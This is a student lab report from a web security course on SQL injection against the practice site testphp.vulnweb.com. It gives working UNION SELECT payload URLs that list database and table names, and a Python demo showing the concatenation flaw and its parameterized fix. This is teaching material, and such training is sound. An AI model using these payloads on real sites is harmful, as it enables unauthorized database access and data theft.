Web & Mobile Security Lab 20CSP-338: Bachelor Degree of Engineering

This document is a lab report submitted by Param Sahai for their Web and Mobile Security lab course. The document includes an introduction, lab index, and details of Experiment 1.4 which explores performing SQL injection attacks from the command line. The steps demonstrate injecting malicious SQL queries into the URL of a vulnerable website to view the database name and table names. Screenshots show the results, including retrieving column names from the users table. An evaluation grid is included at the end to be completed by the faculty.


WEB & MOBILE SECURITY LAB

20CSP-338
Submitted for the requirement of

Lab Course

Bachelor Degree of Engineering

COMPUTER SCIENCE & ENGINEERING

Submitted to: Er. Jayesh Surana
Submitted By: Param Sahai (20BCS5964)

DEPARTMENT OF COMPUTER SCIENCE & ENGINEERING


CHANDIGARH UNIVERSITY, GHARUAN
August-December 2022
LAB INDEX

NAME: Param Sahai
UID: 20BCS5964
SUBJECT NAME: WMS Lab
SUBJECT CODE: 20CSP-338
Class/Section: 619/A

Sr. No. | Program                                                                                        | Date       | Evaluation: LW (12) | VV (8) | FW (10) | Total (30) | Sign
1.      | Identify HTTP packet on a monitoring tool like Wireshark.                                      | 09/08/2022 |                     |        |         |            |
2.      | Design a method to simulate HTML injection and cross site scripting to exploit the attackers.  | 16/08/2022 |                     |        |         |            |
3.      | Understand how to find CSRF vulnerability.                                                     | 28/08/2022 |                     |        |         |            |
4.      | Understand how to perform SQL injection.                                                       | 29/09/2022 |                     |        |         |            |
ii
Param Sahai
20BCS5964
Experiment 1.4

1. Aim/Overview of the practical:


To understand how to perform SQL Injection Attack from the command line (URL).

2. Task to be done/ Which logistics used:


To perform SQL queries to obtain data using SQL injection from the command line (URL).

SQL Injection: SQL Injection (SQLi) is a type of injection attack that makes it possible to execute malicious
SQL statements. These statements control a database server behind a web application. Attackers can use SQL
Injection vulnerabilities to bypass application security measures. They can go around the authentication and
authorization of a web page or web application and retrieve the content of the entire SQL database. They can also
use SQL Injection to add, modify, and delete records in the database.

testphp.vulnweb.com: the vulnerable site that we’ll be using to perform SQL injection.

3. Steps:

i. Here we’ll be using another vulnerable site, testphp.vulnweb.com.

ii. Now, copy and paste the following link: http://testphp.vulnweb.com/listproducts.php?cat=1

iii. Next, turn the URL into a malicious query by adding a minus sign before the 1, i.e.
http://testphp.vulnweb.com/listproducts.php?cat=-1

iv. We can also put a number in the URL along with an ORDER BY clause (this tells us how many columns the page’s query returns).

v. Now, in order to check the database name, search:
http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,7,8,9,10,database()--

vi. For checking the table names:
http://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()--
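To show why steps v and vi work and what the fix looks like, here is an added example (not code from the lab or from the vulnweb site) that rebuilds the listproducts.php?cat=<n> backend as a constructed in-memory SQLite database, runs the lab’s UNION SELECT table-name payload against a string-concatenated query and against a parameterized one, and compares the results. It assumes a three-column select list and uses SQLite’s sqlite_master in place of MySQL’s information_schema.tables.

```python
import sqlite3

# Constructed stand-in for the lab's listproducts.php?cat=<n> backend (not the real site's code).
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(id INTEGER, cat INTEGER, name TEXT);
        INSERT INTO products VALUES (1, 1, 'Poster'), (2, 1, 'Mug'), (3, 2, 'T-shirt');
        CREATE TABLE users(uname TEXT, pass TEXT);
        INSERT INTO users VALUES ('test', 'secret');
    """)
    return conn

def list_products_vulnerable(conn: sqlite3.Connection, cat: str) -> list:
    # The defect: the raw query-string value is concatenated into the SQL text,
    # so 'cat=-1 UNION SELECT ...' from the lab becomes part of the statement.
    sql = "SELECT id, cat, name FROM products WHERE cat=" + cat
    return conn.execute(sql).fetchall()

def list_products_parameterized(conn: sqlite3.Connection, cat: str) -> list:
    # The fix: bind the value as a parameter, so the database never parses it as SQL.
    sql = "SELECT id, cat, name FROM products WHERE cat=?"
    return conn.execute(sql, (cat,)).fetchall()

# Step vi of the lab, adapted to SQLite: sqlite_master stands in for
# MySQL's information_schema.tables (an assumption of this example).
TABLE_NAMES_PAYLOAD = ("-1 UNION SELECT 1, 2, group_concat(name) "
                       "FROM sqlite_master WHERE type='table'--")

def run_demo() -> dict:
    conn = make_db()
    return {
        # Legitimate request: the products in category 1.
        "normal": list_products_vulnerable(conn, "1"),
        # Same payload, concatenated: the table list leaks into the product rows.
        "vulnerable": list_products_vulnerable(conn, TABLE_NAMES_PAYLOAD),
        # Same payload, parameterized: no category equals that string, so no rows.
        "hardened": list_products_parameterized(conn, TABLE_NAMES_PAYLOAD),
    }

if __name__ == "__main__":
    for label, rows in run_demo().items():
        print(f"{label}: {rows}")
```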

Fig 1.4.1 (How a SQL Injection attack works)

4. Screenshots:

Fig 1.4.2 (Opening a vulnerable site: testphp.vulnweb.com)

Fig 1.4.3 (Checking out our query with cat=1)

Fig 1.4.4 (Checking out our query with cat=-1)

Fig 1.4.5 (Performing a UNION SELECT query to find the database name)

Fig 1.4.6 (Performing a UNION SELECT query to find the table names)

Maybe we can get some important data from the users table, so let’s dig further. Again, use the
group_concat function, this time on the columns of the users table, to retrieve all of its column names.
We successfully retrieve all eight column names from the users table.

Fig 1.4.7 (Retrieving the column names using the group_concat function)

Evaluation Grid (To be created as per the SOP and Assessment guidelines by the faculty):

Sr. No. | Parameters | Marks Obtained | Maximum Marks
1.      |            |                |
2.      |            |                |
3.      |            |                |
